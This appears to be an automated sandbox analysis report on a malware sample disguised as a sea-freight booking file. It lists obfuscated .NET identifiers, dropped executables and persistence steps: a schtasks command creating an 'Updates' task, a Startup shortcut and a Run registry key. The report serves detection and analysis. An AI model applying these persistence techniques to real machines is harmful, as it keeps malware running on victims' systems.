Source: 11.2.BhTdjGetAH.exe.288d464.1.raw.unpack, whVbSFDbmJZTsAWLMmphob7SHg0R4bdRNw2BjvOoEgTOMDBCDU1CAVgGsNaFR02HhbWUm.cs	High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', '_3pDfniDpif4ffCBHzv5bH1QqY4RRTgrkEK1pAzNpcDMSMZ', 'xKtnUdWSHKGxkHapMrBiNIn04Rff5XQTqCAhUYQp3i1Ggx', 'IWSntankFfmsXsov89pEhnqj0oTXRR78x8ELNzBMVcL2JJ', '_8L49Fnel5Kq4GFLrTxXWrAGEUYk8hdJyXj47Eme6zHmspu'
Source: 11.2.BhTdjGetAH.exe.288d464.1.raw.unpack, RzV3NqSJmQfWQhjbhOPVza66IRVo.cs	High entropy of concatenated method names: '_6koM63edaR5ulqE8qZJ1WgfYyvzN', '_7JiPm57tnavbvPzY74rgM9y1iJtT', 'Aruijh1no96v0wVBvnLbY4snFt73', 'ctiNUX9oq9EA4zH4jODZblffSAJF', 'uPdhKbuy6nqCVVLRnJ6jlllGGP6d', 'TiPpfFy5VhN0zMwKD1gVMbOzfSgC', 'lXZRxavinAOWbg1hvsGcejk4lw4T', 'KtJjpUvLXGQDROyJaC0DNFqmSRq2', 'xUy9HRbOaV30MYPN9VXbdD8DmCAG', 'LkU1GalO3bNCgLqOcLGi821bM6ee'
Source: 11.2.BhTdjGetAH.exe.288d464.1.raw.unpack, rP7eOmPaR96CBwBf9RIXmfuDoroi.cs	High entropy of concatenated method names: 'Fp8pNXY4fhbes0H5oqiR8jKEBZEH', '_661Zzgo0pdE0U75TsTzuzFsDxHOT', 'rQ2gSBrFnkVUvLbZzLv5ga4o1pjx', 'UCcjzA6PAlfE2LxhvhTzGIXPhpAn', 'baQZZMeWmiqPU9EJp6SLbI5WXnomZoJDRueuC4pQoapccESUO2SzgGF5UW5HlaX2', 'A4xs6CjXolI6X30mxALRiJYTF8jqDZBrf40ysFqc4pWKIxeGhOeiWbew8EvVGJHd', 'b3cjtVyVHy9zn50JJ5VOzoqy9EMuKOGdSQmDI3WGcp0IZVtEsyfaieiqbwg2ahfZ', 'jWzPAkZaZrbCLng1y4jaCC6NLxIzXJIygYb4p4AFgh3XWrw1T9oOD8DL6DWBbM9m', 'f3fHFHct6Px3fevqcMWLBTtjkvfS5HcXz10fUaugglZl9jCzhTqBRW6VQu3ewMiq', 'yZoTAMVjT8hplHJxEV3mjagEx9xvoZqVFtOwVLOVjYWXniPhmYJo75x715dDVsz8'
Source: 11.2.BhTdjGetAH.exe.288d464.1.raw.unpack, s9dzM1HbtTjuXC0T1gSDLB6YlRyDPDyrsQnUAGJGlfWeIFsb33G7o3.cs	High entropy of concatenated method names: 'YcCjk3IRCObvHMNKMfV5o4JSwqVjJYT1ETNC6aRecigMKuqUdX5APZ', 'ixJfdrn6LmwxBbYqgAQnXHR6cgG4nBXj4IdKSYxZWLEje25t7Nm6yU', 'uI78gH23bYal3ybMgr5SDQ3jxmJauyJOfydInZdQ8YffU2zELInMup', 'rdH4HQDf1a9aNYxd1TahzVo8PVO43P6qqwvd0G37maRMv3Z2YsRPmc', 'PaWhnJq9AXy51DsxUYezajDEGfJmiJBKsgzrEbVTlzuFPl2rzTRpN1', '_4BQ3DYannZfE3inYu8TtN3LJ7bFFN00q4eDZhhXWOtxUha', 'LYP31KzmBPtTPIrJIXUvUmQyEbR61Hucx3zGN638UF8FER', '_4ylbuqAJcOlS2lIcVcLmG4d4ZDytwPkBvYEzBziO5CSMPj', 'u5au5R4NydQwiRRRzPLH5eU6pdIvTWiifOU5lTaTXU3dUV', 'Vy38Lr2Vq6EYkCa15HxNy0HDTCTj4xkkNIU9G2f6a3p64C'
Source: 11.2.BhTdjGetAH.exe.288d464.1.raw.unpack, yiyhCCrWBmInfG0a4QCNZtpE2fZz.cs	High entropy of concatenated method names: 'Vf08JYGAkuTJj1mNDuDSCynOx0Aj', 'dH7UkHxKG6zZ76Y42GmShdJcWCsdbHvYbbyWkQQ7cK2zHuz3RxUM6rXRlDqFqjKIgPpcU8ZvUOylxb8ddA4Y19DpCFXx04uw', 'kliHKYqxak7Y74K8xlHEw9jt1cE0LM96QYNbTzXH4VXuyNOznmFWkMFlAcECwfovp7xJdAUUJl0snMeMOdCThGd90PFaBWeA', 'bbfKzODoV2L06uXUsb35VYp7jJKXS8TBJ1WNakloVaPAZs5WhPpM9tumpwLjeXQxrZBA6gTGRhmttjSVhO5A2C80oBSC1WVP', 'aHd9iypJYBPTbdtQCl7Ok99x1nZUZsZEsznscbKdjYqFQj2Eh0WqN3YUy5jfCvoF4Hkovb9mJM9yDlly3rIm0ji28Sndw6UJ'
Source: 11.2.BhTdjGetAH.exe.288d464.1.raw.unpack, MlxLECNQtbM4TD0SojWWFbuDHHiNyqDVt465RvhnIx6GdJ6aaAAsRiQRV8vdL7OvMDJexxo5Ow54v8cX7zqQKT.cs	High entropy of concatenated method names: 'Ththm9CTOMvvm2GyNP8Qzr24jCjdhMSqMKmhGwieTi4yMTgC9uFPmmdsAe4xySIKQP361XwPWd1jaCxGPBsjil', 'jhixk0okiH6FnLIqMolEiqWfLniTXnNWbUgssa3zRYDFr2Rk0WDYWEaapMJOtmnWzdbj9a0VVhIXuwdqkskpcu', 'nAdoeyR1X8X4pimRSBLRLbXwGT6W9c31d2Z10qpK3IzMJnrNxioP5NQy25IioTNLsewZuuBGAaHrCzUj5jEOAh', 'dJQnzA612gtw8ujHxNeqyoOpAvcq8ssRQdsUZAPJ3IZR8rstxuV33yW272jijI13uLrtXrFKCCWd8euuaUY88b', 'u3NX2j7yUQ2p5r4rSnWttUtn1p6VOv7DiD5VILIwDty9G35z89Oov1SydYyzJhrxg4e7vxqrMtI5kzaavcpj4i', 'CPbcyxXDzJ13yCHordyvUP7bVO8xstIqlm68LEXaJo3q4Imu7yi53EXW0m26voMKdC1ab71UnUAqIVbSuUKUq4', 'fM95BZOdW1fmoxegIukzIdcbcty9Go2kvqFfc5EgSUVZfnVQmENPBKqb36sScN93vgiBPrDVnyajk7FoYGvHbC', 'fGAZW4e1W335OvTNw6qX9ZkZtnP6cnHp8wSZ3IDUIuPsNS75Rj1jVp7q2pfDknuUu0uag0KvV0cpgPsPR1a7VO', 'ej1ormzl2jKuOvMwjZ6nm4OM9aHYcjo27iz0oiFHIsNXUAA6XEkXASwwmlmE3nZrzYdlM8WD0aW1DucD6VIcio', 'K9kZlQvWNJvWU7lLA1FD5UujO7vk5bDIjo82PCKpprPgg4mufa91tBmYvFvdedKXqLJKPekHWnHrhD1pc3O63u'
Source: 11.2.BhTdjGetAH.exe.288d464.1.raw.unpack, AwEg9KwvdcsSNSTrrziGMrveBN1p.cs	High entropy of concatenated method names: 'B23wVkYTRRlbvZPXNLXxIoOG2zrc', '_1nQfddviA6nptTfkr6TfyQY4rgxN40GBmufbL4TjTGyzc4njPykP4mxfk7CDp08r', 'ConDlLttcHyi0bvUIXIvd7ZhdNhwTtGLWyDDdezukc6tpfqHJUpxh0Y8lIuoBBJO', 'xffgxamw2yiuFaeTRpUFcPK0Fb3CaJgPpY9bMzjBfhHYcGZYQWY3vbWC8ITRQJOV', 'b3Ceji6v4OiedAr2PLCKgpF3X5xQkHVhOQ5aKhoQL5ukRlGZsSklPpLulBwOFUqc'
Source: 11.2.BhTdjGetAH.exe.288d464.1.raw.unpack, lDNrZ0PpIhtkmNhtuLhViabWwcRagB8W7OumnW1em5VOXVAZufAe0j.cs	High entropy of concatenated method names: 'Y1ITG5MBR8142OiTMq6Zq60AoqWLOu7vDN9kZguwRz4rrKYDeseG8s', 'YRJFCxHjM7pPS4tNaT7iQrZf3P0nMtI4vOCFptxbgzKLYau24ZfSVv', 'nCJtZvaszp6oSFBL7GMdxt7QYF2vHScvtNGMXj2FMFL1HGIapNV4Nm', 'unpnLLLGMEjTQEUUBSj3mxvpQAbkt5HxZNTRjEyRODRSiZxTDm3ZG1', 'RAt0CxcgEb13BldbyvusZ6MAjrul1qh5NtQmMsF3SUmeKVwNx3CMeJ', 'duRVETZzWT64PiCNxiLb2ZTVL5cyIBFb0Tz44PVeMxvn6DYdrsjb0y', '_9hDXJ4K0XixM3bAx328T6bJ8kA4hPCruVIEYrs79DPLZYdXXXxG7C4', 'e4J5jbEn0rCBRh9jVC2QZTf9G24OA5JndJL1xso81EK2Rz4K5HXSVT', '_9jFrliaKxwwrVaHlKlmyHrIWBPEAljm6iyt2h7SJgRhygyHojB5BdN', '_9HnDvdBf3YlSqtdiZPhJ6vE7g42q2TY16T744fQeuQP8swsNcqvl7X'
Source: 11.2.BhTdjGetAH.exe.288d464.1.raw.unpack, UZUv4Eo6zQhbxPiCqZPo3OnZwa02.cs	High entropy of concatenated method names: 'zqSbnYJ7TRzPGM4DTBz55wB90X1H', '_4oLwAniIUZb3pHfgNlXqONekWHg3', 'CDzVFa3gZC10reMa61ZgV5cAkx86', 'sRTHUEnQNBOe33KZfvWLwDJhWgNw', 'jVgxlhUWvyKuBGP8wBjwY8ZLosae', 'bpEpLSR4YKp0SwBpXSNr4FZBegZ3', 'JEcOqiKQuo1NMNAgJ57suc0Fv4mR', 'zXHcrIVLQWaWHBgyaBEeGMLqmc93', 'IMzLMpiHmTzbaQSc0F1wjAm9srhz', 'rHGQSVSfZ2Gp1JnWnS0x8LpowN1k'
Source: 11.2.BhTdjGetAH.exe.2878b80.0.raw.unpack, Sox3Yx3dx4S3f1tLhIfqbcbVLGgKG4P8tgojSYo8MASOLmPaWwtaUv.cs	High entropy of concatenated method names: 'GgpMcZhIjR4120pY8u6uCAiRH4QL01oA8al3eaKERyo7Gz', 'ox5p61KJCv91fSFYDHVf3yI6mIZn5ghkne6RW0Q8ZPdDkx', 'TkIpa4am8tCYuP2dbxBDwmHKEDZIHnVId2GnDhDqTVhJPo', '_3e2Pfn3Q4rzLu9onfN67v8ko7Z5GrYRUc35ZD0QCHbo1YY'
Source: 11.2.BhTdjGetAH.exe.2878b80.0.raw.unpack, PHumo8U1BHf4b2B0BWI8ZjmYpkj0.cs	High entropy of concatenated method names: 'RFCRLGhpvr9NYR00cC1jYzzhNoGc', 'IqIjmnuxJ3fJRXpWx5i6p06BvknH', 'h0QcBPr1tUpbbttnFh9pKeMIsLO0', 'JSwQAKrE3hy1Xa8kCeMUMHl7tDFE7zJBBkYpqtl37oquI8kO6qW3jvG253n2hGlwshqFcUIXl44Oait8Y', 'fhf8l63mvf58nkljMdtns2rS0jJ2Ku25GBqPsf8n0AKTalQsLlJ1tFYxXYqj7TVM2LHXF5CxOxaHtM6jA', 'vQNlFV5MYsgGnmsnjddhs1LPn3prl9t7ngD4qJeNWZriEhRxGwEXYYAjMr6ahuqzuXFsZfVbLVzkS41Vy', '_8AGsKmcQHxtfYjXjvmBkfPnUSkoIgwMqT93GOJ9ShoozPTN2nEFJUp1bsZ9zGgtDGeiV63iY7TYgp9hVJ', 'tjTEJDI9pAPfnZ6wp0X14AFZ0NjjbgGWPfaONvZW9uBIRqGF58ytx59qIdox5dfKk6pi14jdQPhI5tn1s', 'OgjQKOuHxlVXiA61HD7fxqZ7wejN9zDbP17G8kaz8wQSe8FZyV8JQxKKzHnOgBQzAe9fJZzpQEsYpLtVb', '_0rspqqxb6onB15LoNuYaKLkSfLMALfE6Z1AIUy9jHx0zKOpBrulxBSe7HFGDte3YPXrP3wiRXGoncCsf4'
Source: 11.2.BhTdjGetAH.exe.2878b80.0.raw.unpack, whVbSFDbmJZTsAWLMmphob7SHg0R4bdRNw2BjvOoEgTOMDBCDU1CAVgGsNaFR02HhbWUm.cs	High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', '_3pDfniDpif4ffCBHzv5bH1QqY4RRTgrkEK1pAzNpcDMSMZ', 'xKtnUdWSHKGxkHapMrBiNIn04Rff5XQTqCAhUYQp3i1Ggx', 'IWSntankFfmsXsov89pEhnqj0oTXRR78x8ELNzBMVcL2JJ', '_8L49Fnel5Kq4GFLrTxXWrAGEUYk8hdJyXj47Eme6zHmspu'
Source: 11.2.BhTdjGetAH.exe.2878b80.0.raw.unpack, RzV3NqSJmQfWQhjbhOPVza66IRVo.cs	High entropy of concatenated method names: '_6koM63edaR5ulqE8qZJ1WgfYyvzN', '_7JiPm57tnavbvPzY74rgM9y1iJtT', 'Aruijh1no96v0wVBvnLbY4snFt73', 'ctiNUX9oq9EA4zH4jODZblffSAJF', 'uPdhKbuy6nqCVVLRnJ6jlllGGP6d', 'TiPpfFy5VhN0zMwKD1gVMbOzfSgC', 'lXZRxavinAOWbg1hvsGcejk4lw4T', 'KtJjpUvLXGQDROyJaC0DNFqmSRq2', 'xUy9HRbOaV30MYPN9VXbdD8DmCAG', 'LkU1GalO3bNCgLqOcLGi821bM6ee'
Source: 11.2.BhTdjGetAH.exe.2878b80.0.raw.unpack, rP7eOmPaR96CBwBf9RIXmfuDoroi.cs	High entropy of concatenated method names: 'Fp8pNXY4fhbes0H5oqiR8jKEBZEH', '_661Zzgo0pdE0U75TsTzuzFsDxHOT', 'rQ2gSBrFnkVUvLbZzLv5ga4o1pjx', 'UCcjzA6PAlfE2LxhvhTzGIXPhpAn', 'baQZZMeWmiqPU9EJp6SLbI5WXnomZoJDRueuC4pQoapccESUO2SzgGF5UW5HlaX2', 'A4xs6CjXolI6X30mxALRiJYTF8jqDZBrf40ysFqc4pWKIxeGhOeiWbew8EvVGJHd', 'b3cjtVyVHy9zn50JJ5VOzoqy9EMuKOGdSQmDI3WGcp0IZVtEsyfaieiqbwg2ahfZ', 'jWzPAkZaZrbCLng1y4jaCC6NLxIzXJIygYb4p4AFgh3XWrw1T9oOD8DL6DWBbM9m', 'f3fHFHct6Px3fevqcMWLBTtjkvfS5HcXz10fUaugglZl9jCzhTqBRW6VQu3ewMiq', 'yZoTAMVjT8hplHJxEV3mjagEx9xvoZqVFtOwVLOVjYWXniPhmYJo75x715dDVsz8'
Source: 11.2.BhTdjGetAH.exe.2878b80.0.raw.unpack, s9dzM1HbtTjuXC0T1gSDLB6YlRyDPDyrsQnUAGJGlfWeIFsb33G7o3.cs	High entropy of concatenated method names: 'YcCjk3IRCObvHMNKMfV5o4JSwqVjJYT1ETNC6aRecigMKuqUdX5APZ', 'ixJfdrn6LmwxBbYqgAQnXHR6cgG4nBXj4IdKSYxZWLEje25t7Nm6yU', 'uI78gH23bYal3ybMgr5SDQ3jxmJauyJOfydInZdQ8YffU2zELInMup', 'rdH4HQDf1a9aNYxd1TahzVo8PVO43P6qqwvd0G37maRMv3Z2YsRPmc', 'PaWhnJq9AXy51DsxUYezajDEGfJmiJBKsgzrEbVTlzuFPl2rzTRpN1', '_4BQ3DYannZfE3inYu8TtN3LJ7bFFN00q4eDZhhXWOtxUha', 'LYP31KzmBPtTPIrJIXUvUmQyEbR61Hucx3zGN638UF8FER', '_4ylbuqAJcOlS2lIcVcLmG4d4ZDytwPkBvYEzBziO5CSMPj', 'u5au5R4NydQwiRRRzPLH5eU6pdIvTWiifOU5lTaTXU3dUV', 'Vy38Lr2Vq6EYkCa15HxNy0HDTCTj4xkkNIU9G2f6a3p64C'
Source: 11.2.BhTdjGetAH.exe.2878b80.0.raw.unpack, yiyhCCrWBmInfG0a4QCNZtpE2fZz.cs	High entropy of concatenated method names: 'Vf08JYGAkuTJj1mNDuDSCynOx0Aj', 'dH7UkHxKG6zZ76Y42GmShdJcWCsdbHvYbbyWkQQ7cK2zHuz3RxUM6rXRlDqFqjKIgPpcU8ZvUOylxb8ddA4Y19DpCFXx04uw', 'kliHKYqxak7Y74K8xlHEw9jt1cE0LM96QYNbTzXH4VXuyNOznmFWkMFlAcECwfovp7xJdAUUJl0snMeMOdCThGd90PFaBWeA', 'bbfKzODoV2L06uXUsb35VYp7jJKXS8TBJ1WNakloVaPAZs5WhPpM9tumpwLjeXQxrZBA6gTGRhmttjSVhO5A2C80oBSC1WVP', 'aHd9iypJYBPTbdtQCl7Ok99x1nZUZsZEsznscbKdjYqFQj2Eh0WqN3YUy5jfCvoF4Hkovb9mJM9yDlly3rIm0ji28Sndw6UJ'
Source: 11.2.BhTdjGetAH.exe.2878b80.0.raw.unpack, MlxLECNQtbM4TD0SojWWFbuDHHiNyqDVt465RvhnIx6GdJ6aaAAsRiQRV8vdL7OvMDJexxo5Ow54v8cX7zqQKT.cs	High entropy of concatenated method names: 'Ththm9CTOMvvm2GyNP8Qzr24jCjdhMSqMKmhGwieTi4yMTgC9uFPmmdsAe4xySIKQP361XwPWd1jaCxGPBsjil', 'jhixk0okiH6FnLIqMolEiqWfLniTXnNWbUgssa3zRYDFr2Rk0WDYWEaapMJOtmnWzdbj9a0VVhIXuwdqkskpcu', 'nAdoeyR1X8X4pimRSBLRLbXwGT6W9c31d2Z10qpK3IzMJnrNxioP5NQy25IioTNLsewZuuBGAaHrCzUj5jEOAh', 'dJQnzA612gtw8ujHxNeqyoOpAvcq8ssRQdsUZAPJ3IZR8rstxuV33yW272jijI13uLrtXrFKCCWd8euuaUY88b', 'u3NX2j7yUQ2p5r4rSnWttUtn1p6VOv7DiD5VILIwDty9G35z89Oov1SydYyzJhrxg4e7vxqrMtI5kzaavcpj4i', 'CPbcyxXDzJ13yCHordyvUP7bVO8xstIqlm68LEXaJo3q4Imu7yi53EXW0m26voMKdC1ab71UnUAqIVbSuUKUq4', 'fM95BZOdW1fmoxegIukzIdcbcty9Go2kvqFfc5EgSUVZfnVQmENPBKqb36sScN93vgiBPrDVnyajk7FoYGvHbC', 'fGAZW4e1W335OvTNw6qX9ZkZtnP6cnHp8wSZ3IDUIuPsNS75Rj1jVp7q2pfDknuUu0uag0KvV0cpgPsPR1a7VO', 'ej1ormzl2jKuOvMwjZ6nm4OM9aHYcjo27iz0oiFHIsNXUAA6XEkXASwwmlmE3nZrzYdlM8WD0aW1DucD6VIcio', 'K9kZlQvWNJvWU7lLA1FD5UujO7vk5bDIjo82PCKpprPgg4mufa91tBmYvFvdedKXqLJKPekHWnHrhD1pc3O63u'
Source: 11.2.BhTdjGetAH.exe.2878b80.0.raw.unpack, AwEg9KwvdcsSNSTrrziGMrveBN1p.cs	High entropy of concatenated method names: 'B23wVkYTRRlbvZPXNLXxIoOG2zrc', '_1nQfddviA6nptTfkr6TfyQY4rgxN40GBmufbL4TjTGyzc4njPykP4mxfk7CDp08r', 'ConDlLttcHyi0bvUIXIvd7ZhdNhwTtGLWyDDdezukc6tpfqHJUpxh0Y8lIuoBBJO', 'xffgxamw2yiuFaeTRpUFcPK0Fb3CaJgPpY9bMzjBfhHYcGZYQWY3vbWC8ITRQJOV', 'b3Ceji6v4OiedAr2PLCKgpF3X5xQkHVhOQ5aKhoQL5ukRlGZsSklPpLulBwOFUqc'
Source: 11.2.BhTdjGetAH.exe.2878b80.0.raw.unpack, lDNrZ0PpIhtkmNhtuLhViabWwcRagB8W7OumnW1em5VOXVAZufAe0j.cs	High entropy of concatenated method names: 'Y1ITG5MBR8142OiTMq6Zq60AoqWLOu7vDN9kZguwRz4rrKYDeseG8s', 'YRJFCxHjM7pPS4tNaT7iQrZf3P0nMtI4vOCFptxbgzKLYau24ZfSVv', 'nCJtZvaszp6oSFBL7GMdxt7QYF2vHScvtNGMXj2FMFL1HGIapNV4Nm', 'unpnLLLGMEjTQEUUBSj3mxvpQAbkt5HxZNTRjEyRODRSiZxTDm3ZG1', 'RAt0CxcgEb13BldbyvusZ6MAjrul1qh5NtQmMsF3SUmeKVwNx3CMeJ', 'duRVETZzWT64PiCNxiLb2ZTVL5cyIBFb0Tz44PVeMxvn6DYdrsjb0y', '_9hDXJ4K0XixM3bAx328T6bJ8kA4hPCruVIEYrs79DPLZYdXXXxG7C4', 'e4J5jbEn0rCBRh9jVC2QZTf9G24OA5JndJL1xso81EK2Rz4K5HXSVT', '_9jFrliaKxwwrVaHlKlmyHrIWBPEAljm6iyt2h7SJgRhygyHojB5BdN', '_9HnDvdBf3YlSqtdiZPhJ6vE7g42q2TY16T744fQeuQP8swsNcqvl7X'
Source: 11.2.BhTdjGetAH.exe.2878b80.0.raw.unpack, UZUv4Eo6zQhbxPiCqZPo3OnZwa02.cs	High entropy of concatenated method names: 'zqSbnYJ7TRzPGM4DTBz55wB90X1H', '_4oLwAniIUZb3pHfgNlXqONekWHg3', 'CDzVFa3gZC10reMa61ZgV5cAkx86', 'sRTHUEnQNBOe33KZfvWLwDJhWgNw', 'jVgxlhUWvyKuBGP8wBjwY8ZLosae', 'bpEpLSR4YKp0SwBpXSNr4FZBegZ3', 'JEcOqiKQuo1NMNAgJ57suc0Fv4mR', 'zXHcrIVLQWaWHBgyaBEeGMLqmc93', 'IMzLMpiHmTzbaQSc0F1wjAm9srhz', 'rHGQSVSfZ2Gp1JnWnS0x8LpowN1k'

Creates processes with suspicious names

Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	File created: \for jobref oc-seaexp yfc export-sea booking853ipn0006279.exe
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	File created: \for jobref oc-seaexp yfc export-sea booking853ipn0006279.exe
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	File created: \for jobref oc-seaexp yfc export-sea booking853ipn0006279.exe
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	File created: \for jobref oc-seaexp yfc export-sea booking853ipn0006279.exe
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	File created: \for jobref oc-seaexp yfc export-sea booking853ipn0006279.exe
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	File created: \for jobref oc-seaexp yfc export-sea booking853ipn0006279.exe
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	File created: \for jobref oc-seaexp yfc export-sea booking853ipn0006279.exe
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	File created: \for jobref oc-seaexp yfc export-sea booking853ipn0006279.exe
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	File created: \for jobref oc-seaexp yfc export-sea booking853ipn0006279.exe
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	File created: \for jobref oc-seaexp yfc export-sea booking853ipn0006279.exe	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	File created: \for jobref oc-seaexp yfc export-sea booking853ipn0006279.exe	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	File created: \for jobref oc-seaexp yfc export-sea booking853ipn0006279.exe	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	File created: \for jobref oc-seaexp yfc export-sea booking853ipn0006279.exe	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	File created: \for jobref oc-seaexp yfc export-sea booking853ipn0006279.exe	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	File created: \for jobref oc-seaexp yfc export-sea booking853ipn0006279.exe	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	File created: \for jobref oc-seaexp yfc export-sea booking853ipn0006279.exe	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	File created: \for jobref oc-seaexp yfc export-sea booking853ipn0006279.exe	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	File created: \for jobref oc-seaexp yfc export-sea booking853ipn0006279.exe	Jump to behavior

Drops PE files

Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	File created: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe			Jump to dropped file
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	File created: C:\Users\user\AppData\Local\XClient.exe			Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BhTdjGetAH" /XML "C:\Users\user\AppData\Local\Temp\tmp378C.tmp"

Creates a start menu entry (Start Menu\Programs\Startup)

Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk

Jump to behavior

Stores files to the Windows start menu directory

Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk

Jump to behavior

Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XClient			Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XClient			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
